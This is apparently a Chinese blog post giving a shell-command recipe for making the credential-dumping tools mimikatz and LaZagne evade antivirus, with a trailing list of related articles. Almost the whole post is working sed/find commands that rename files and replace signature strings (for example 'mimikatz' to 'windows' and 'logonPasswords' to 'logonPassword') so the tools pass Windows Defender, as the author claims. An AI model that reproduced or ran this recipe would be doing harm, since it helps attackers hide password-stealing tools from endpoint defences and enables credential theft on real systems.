关于mimikatz lazagne免杀方法
其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过
文章直接从笔记复制出来的,有需要的自己看情况用
git clone https://github.com/gentilkiwi/mimikatz.git lmmg
mv lmmg/mimikatz lmmg/lmmg
find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
mv "${FILE}" "${newfile}";
done
find lmmg/ -type f -print0 | xargs - sed -i 's/mimikatz/windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/MIMIKATZ/WINDOWS/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Mimikatz/Windows/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DELPY/gweep/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Benjamin/gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/creativecommons/notcommons/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/gentilkiwi/MSOffice/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/KIWI/ONEDRIVE/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/Kiwi/Onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/kiwi/onedrive/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/DumpCreds/DumpCred/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/logonPasswords/logonPassword/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/ArgumentPtr/NotTodayPal/g'
find lmmg/ -type f -print0 | xargs - sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' cd ./lmmg/lmmg/
sed -i "0,/#if \!defined(_POWERKATZ)/! {0,/#if \!defined(_POWERKATZ)/ s/#if \!defined(_POWERKATZ)/\/*\r\n#if \!defined(_POWERKATZ)/}" windows.c
sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif\r\n*\//}}" windows.c lazagne
find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
mv "${FILE}" "${newfile}";
done
find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
mv "${FILE}" "${newfile}";
done find windows/ -type f -print0 | xargs - sed -i 's/lazagne/kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/LaZagne/Kmm/g'
find windows/ -type f -print0 | xargs - sed -i 's/laZagne/KMm/g' find windows/ -type f -print0 | xargs - sed -i 's/BANG/bg/g'
find windows/ -type f -print0 | xargs - sed -i 's/passwords ---------------/vp/g'
find windows/ -type f -print0 | xargs - sed -i 's/Password not found/nop/g'
find windows/ -type f -print0 | xargs - sed -i 's/=================================================================/ll/g'
find windows/ -type f -print0 | xargs - sed -i 's/########## User/lp/g'
find windows/ -type f -print0 | xargs - sed -i 's/For more information launch it again with the -v option/jj/g'
关于mimikatz lazagne免杀方法的更多相关文章
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- lcx源代码以及免杀的研究
之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软.顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下. 报毒情况 因为使用 ...
- 2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践
实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcod ...
- 2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践
一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 ( ...
- 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践
2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...
- 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...
- 2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165236 Exp3 免杀原理与实践 一.实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5 ...
- NetSec2019 20165327 Exp3 免杀原理与实践
NetSec2019 20165327 Exp3 免杀原理与实践 pre基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清 ...
- 2018-2019-2 网络对抗技术 20165326 Exp3 免杀原理与实践
免杀原理与实践 目录 知识点问答 实践内容 遇到的问题 心得体会 知识点 meterpreter免杀 基础问题回答 杀软是如何检测出恶意代码的? 特征码(基于签名):模式匹配,比对特征码库 启发式:通 ...
随机推荐
- Python3 学习笔记之 变量/字符串/if/while/逻辑运算符/模块引用
变量/if/while/逻辑运算符/模块引用: 变量: 使用变量前必须先赋值. 大小写区分. Python创建字符串,在字符串两边可以加上单引号或者双引号. 打印单引号或双引号,使用转移\ 使用\进行 ...
- SpannableString与SpannableStringBuilder
一.概述 1.SpannableString.SpannableStringBuilder与String的关系 首先SpannableString.SpannableStringBuilder基本上与 ...
- 使用低版本的VS打开高版本项目的解决方案(以VS2008打开VS2010开发的项目为例)
使用低版本的VS打开高版本项目的解决方案,这里以VS2008打开VS2010开发的项目为例. 右键项目的sln文件以记事本的方式打开: 将对应的前两列版本各降到对应的版本,这边的11.00改为10.0 ...
- Vue核心知识——computed和watch的细节全面分析
computed和watch的区别 computed特性 1.是计算值,2.应用:就是简化tempalte里面{{}}计算和处理props或$emit的传值,computed(数据联动).3.具有缓存 ...
- 深入了解opacity和rgba
1. rgba 首先它是一个属性值,语法为rgba(r,g,b,a) - r为红色值, 正整数 | 百分数 - g为绿色值,正整数 | 百分数 - b为蓝色值,正整数 | 百分数 - a为alpha( ...
- BZOJ 4621: Tc605
Description 最初你有一个长度为 N 的数字序列 A.为了方便起见,序列 A 是一个排列. 你可以操作最多 K 次.每一次操作你可以先选定一个 A 的一个子串,然后将这个子串的数字全部变成原 ...
- LeetCode初级算法--字符串01:反转字符串
LeetCode初级算法--字符串01:反转字符串 搜索微信公众号:'AI-ming3526'或者'计算机视觉这件小事' 获取更多算法.机器学习干货 csdn:https://blog.csdn.ne ...
- MySQL学习(四)深入理解乐观锁与悲观锁
转载自:http://www.hollischuang.com/archives/934 在数据库的锁机制中介绍过,数据库管理系统(DBMS)中的并发控制的任务是确保在多个事务同时存取数据库中同一数据 ...
- Flask的使用以及返回值(其中Response后续详细单独补充)
一.使用 安装依赖pip3 install flask 第一步 创建Flask对象 from flask import Flask app =Flask(__name__) 第二步 创建路由 @app ...
- 想转行做程序员,目前想学WEB前端,想问该自学还是报培训班
首先我们还是先看一下WEB前端目前的工资情况吧,我在IT招聘网站拉勾网来进行搜索1-3年WEB前端工作经验大专学历的条件来看. 深圳: 可以看出目前深圳的平均的工资都在10K以上,因为大城市给的机会多 ...